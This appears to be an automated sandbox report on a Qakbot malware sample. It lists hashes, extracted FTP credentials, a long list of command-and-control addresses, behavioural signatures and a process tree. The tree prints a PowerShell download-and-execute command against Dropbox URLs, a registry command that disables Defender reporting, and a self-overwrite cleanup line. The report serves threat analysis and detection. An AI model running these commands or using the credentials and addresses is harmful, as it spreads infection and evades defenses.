Analysis
-
max time kernel
20s -
max time network
73s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-07-2022 03:44
Static task
static1
Behavioral task
behavioral1
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win10v2004-20220414-en
General
-
Target
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
-
Size
616KB
-
MD5
adab2a637738b6780e74b74dcabbb96f
-
SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0
-
SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
-
SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.368
1532427880
Protocol: ftp- Host:
37.60.244.211 - Port:
21 - Username:
[email protected] - Password:
4AsEzIaMwi2d
Protocol: ftp- Host:
198.38.77.162 - Port:
21 - Username:
[email protected] - Password:
kJm6DKVPfyiv
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
[email protected] - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
[email protected] - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
[email protected] - Password:
RoP4Af0RKAAQ74V
216.218.74.196:443
185.219.83.73:443
50.198.141.161:2078
70.118.18.242:443
68.113.142.24:465
72.193.162.108:443
98.225.141.232:443
216.201.159.118:443
73.130.229.200:443
76.73.202.82:443
67.197.97.144:443
71.77.22.206:443
47.40.29.239:443
65.116.179.83:443
96.248.15.254:995
47.134.236.166:443
173.81.42.136:20
73.106.122.121:443
98.103.2.226:443
181.93.205.181:443
75.189.235.216:443
74.88.210.56:995
24.100.46.201:2222
24.228.185.224:2222
24.11.50.136:443
184.180.157.203:2222
68.173.55.51:443
68.49.120.179:443
76.169.73.234:443
216.21.168.27:32101
75.127.141.50:995
50.42.189.206:993
70.169.12.141:443
93.108.180.227:443
98.16.70.197:2222
71.210.153.133:443
105.227.20.203:443
73.40.24.158:443
24.163.66.146:443
173.248.24.230:443
216.21.168.27:995
174.48.72.160:443
47.223.89.43:443
68.129.231.84:443
190.185.219.110:443
67.83.122.112:2222
97.97.160.42:443
207.178.109.161:443
71.190.202.120:443
99.197.182.183:443
24.6.31.163:443
174.84.12.107:443
73.152.213.187:80
97.84.210.38:2222
68.59.209.183:995
98.243.166.148:443
172.119.71.75:995
150.200.247.87:443
72.179.39.89:443
67.76.36.112:443
174.109.117.152:443
73.52.101.153:80
72.174.25.139:443
173.70.44.171:443
70.21.182.149:2222
189.175.149.128:443
68.206.135.146:443
216.21.168.27:50000
50.32.243.36:443
24.141.179.121:443
68.32.58.9:443
173.80.75.177:443
174.124.227.84:443
47.48.236.98:2222
24.175.103.122:995
24.209.130.208:443
24.252.80.93:443
96.73.55.193:993
75.109.193.173:1194
75.109.193.173:2087
75.109.193.173:8443
70.182.79.66:443
97.70.85.248:443
65.191.74.248:443
65.40.207.151:995
68.207.43.173:443
66.189.228.49:995
73.183.145.218:2222
209.213.24.194:443
71.213.173.77:61200
67.197.104.90:443
68.207.33.242:443
172.87.188.2:443
204.85.12.25:443
68.226.136.96:443
174.235.3.127:443
104.153.240.6:2222
24.180.246.147:443
24.93.104.154:443
75.106.233.194:443
65.191.128.99:443
66.227.135.213:443
65.169.66.123:2222
68.206.131.246:443
71.172.250.114:443
67.55.174.194:443
107.15.153.110:8443
204.133.181.227:443
47.221.46.163:443
71.48.218.91:995
73.74.72.141:443
71.85.72.9:443
96.32.171.132:443
172.164.17.102:443
173.191.238.124:995
47.186.93.228:443
68.228.118.130:32100
209.180.154.97:995
68.133.47.150:443
75.189.239.153:443
204.85.12.26:443
76.101.165.66:443
97.84.166.64:443
173.160.3.209:443
72.133.75.134:443
68.207.45.236:443
67.181.17.143:443
79.166.125.245:443
24.180.246.147:465
71.77.128.23:443
73.58.60.60:443
63.79.135.0:443
50.111.32.211:443
208.104.163.142:443
68.207.33.232:2222
204.210.158.207:465
73.152.213.47:443
172.116.138.154:995
96.85.138.153:443
68.207.48.22:443
174.48.211.60:443
24.42.164.2:2222
71.210.16.7:443
108.35.23.218:443
71.33.167.143:995
68.189.161.115:443
24.180.246.147:995
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 18 4584 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
gwwusfxz.exegwwusfxz.exepid process 4124 gwwusfxz.exe 4748 gwwusfxz.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exegwwusfxz.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc gwwusfxz.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service gwwusfxz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 gwwusfxz.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 gwwusfxz.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc gwwusfxz.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service gwwusfxz.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exegwwusfxz.exepowershell.exegwwusfxz.exeexplorer.exesihost.exesvchost.exetaskhostw.exeExplorer.EXEsvchost.exepid process 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1612 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1612 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1612 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 1612 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4124 gwwusfxz.exe 4124 gwwusfxz.exe 4584 powershell.exe 4584 powershell.exe 4748 gwwusfxz.exe 4748 gwwusfxz.exe 4748 gwwusfxz.exe 4748 gwwusfxz.exe 5056 explorer.exe 5056 explorer.exe 5056 explorer.exe 5056 explorer.exe 2272 sihost.exe 2272 sihost.exe 2288 svchost.exe 2288 svchost.exe 2444 taskhostw.exe 2444 taskhostw.exe 2092 Explorer.EXE 2092 Explorer.EXE 3084 svchost.exe 3084 svchost.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
gwwusfxz.exepid process 4124 gwwusfxz.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4584 powershell.exe -
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exegwwusfxz.exeexplorer.execmd.exedescription pid process target process PID 912 wrote to memory of 1612 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 912 wrote to memory of 1612 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 912 wrote to memory of 1612 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe PID 912 wrote to memory of 4124 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe gwwusfxz.exe PID 912 wrote to memory of 4124 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe gwwusfxz.exe PID 912 wrote to memory of 4124 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe gwwusfxz.exe PID 912 wrote to memory of 2132 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 912 wrote to memory of 2132 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe reg.exe PID 912 wrote to memory of 4584 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 912 wrote to memory of 4584 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe powershell.exe PID 4124 wrote to memory of 4748 4124 gwwusfxz.exe gwwusfxz.exe PID 4124 wrote to memory of 4748 4124 gwwusfxz.exe gwwusfxz.exe PID 4124 wrote to memory of 4748 4124 gwwusfxz.exe gwwusfxz.exe PID 4124 wrote to memory of 5056 4124 gwwusfxz.exe explorer.exe PID 4124 wrote to memory of 5056 4124 gwwusfxz.exe explorer.exe PID 4124 wrote to memory of 5056 4124 gwwusfxz.exe explorer.exe PID 4124 wrote to memory of 5056 4124 gwwusfxz.exe explorer.exe PID 912 wrote to memory of 5044 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 912 wrote to memory of 5044 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 912 wrote to memory of 5044 912 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe cmd.exe PID 5056 wrote to memory of 2272 5056 explorer.exe sihost.exe PID 5056 wrote to memory of 2272 5056 explorer.exe sihost.exe PID 5056 wrote to memory of 2272 5056 explorer.exe sihost.exe PID 5044 wrote to memory of 4640 5044 cmd.exe PING.EXE PID 5044 wrote to memory of 4640 5044 cmd.exe PING.EXE PID 5044 wrote to memory of 4640 5044 cmd.exe PING.EXE PID 5056 wrote to memory of 2288 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 2288 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 2288 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 2444 5056 explorer.exe taskhostw.exe PID 5056 wrote to memory of 2444 5056 explorer.exe taskhostw.exe PID 5056 wrote to memory of 2444 5056 explorer.exe taskhostw.exe PID 5056 wrote to memory of 2092 5056 explorer.exe Explorer.EXE PID 5056 wrote to memory of 2092 5056 explorer.exe Explorer.EXE PID 5056 wrote to memory of 2092 5056 explorer.exe Explorer.EXE PID 5056 wrote to memory of 3084 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 3084 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 3084 5056 explorer.exe svchost.exe PID 5056 wrote to memory of 3292 5056 explorer.exe DllHost.exe PID 5056 wrote to memory of 3292 5056 explorer.exe DllHost.exe PID 5056 wrote to memory of 3292 5056 explorer.exe DllHost.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exeC:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe" /C4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jaqhvnzhwhynhbmqqjwszaxuxcza.txt'"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfx.datFilesize
92B
MD5afa2afe332d1e22d1f5d85be495d1693
SHA1357d0f4d9c86fedd608edf1e172d974d8a9a7438
SHA25679e02368bccfabdbee810fc90f7266baaf8031b31d21c80a4fab6f58fd85c2f2
SHA51288c8e9e7900e0af1cc7e0bf8950400465929eb241292c596028a35e3bf78894ee890353581251f75d02d02f40154e0fecb834acb2acb34cb5cbdc32bf4beefef
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exeFilesize
616KB
MD5adab2a637738b6780e74b74dcabbb96f
SHA10614b295d8f8486ea42c89be35b3e44926a943c0
SHA2564845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA51272d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
-
memory/912-130-0x0000000000400000-0x000000000049E000-memory.dmpFilesize
632KB
-
memory/912-134-0x0000000000570000-0x0000000000576000-memory.dmpFilesize
24KB
-
memory/1612-135-0x0000000000000000-mapping.dmp
-
memory/1612-140-0x0000000000530000-0x0000000000536000-memory.dmpFilesize
24KB
-
memory/2092-170-0x0000000006F30000-0x0000000006F5C000-memory.dmpFilesize
176KB
-
memory/2132-143-0x0000000000000000-mapping.dmp
-
memory/2272-167-0x0000000000C80000-0x0000000000CAC000-memory.dmpFilesize
176KB
-
memory/2288-168-0x0000000000090000-0x00000000000BC000-memory.dmpFilesize
176KB
-
memory/2444-169-0x0000000000420000-0x000000000044C000-memory.dmpFilesize
176KB
-
memory/4124-141-0x0000000000000000-mapping.dmp
-
memory/4124-151-0x00000000006C0000-0x00000000006C6000-memory.dmpFilesize
24KB
-
memory/4584-150-0x000002C8A7890000-0x000002C8A78B2000-memory.dmpFilesize
136KB
-
memory/4584-152-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmpFilesize
10.8MB
-
memory/4584-149-0x0000000000000000-mapping.dmp
-
memory/4584-160-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmpFilesize
10.8MB
-
memory/4640-164-0x0000000000000000-mapping.dmp
-
memory/4748-159-0x00000000004E0000-0x00000000004E6000-memory.dmpFilesize
24KB
-
memory/4748-153-0x0000000000000000-mapping.dmp
-
memory/5044-162-0x0000000000000000-mapping.dmp
-
memory/5056-165-0x0000000000F30000-0x0000000000F99000-memory.dmpFilesize
420KB
-
memory/5056-166-0x00000000016A0000-0x00000000016CF000-memory.dmpFilesize
188KB
-
memory/5056-161-0x0000000000000000-mapping.dmp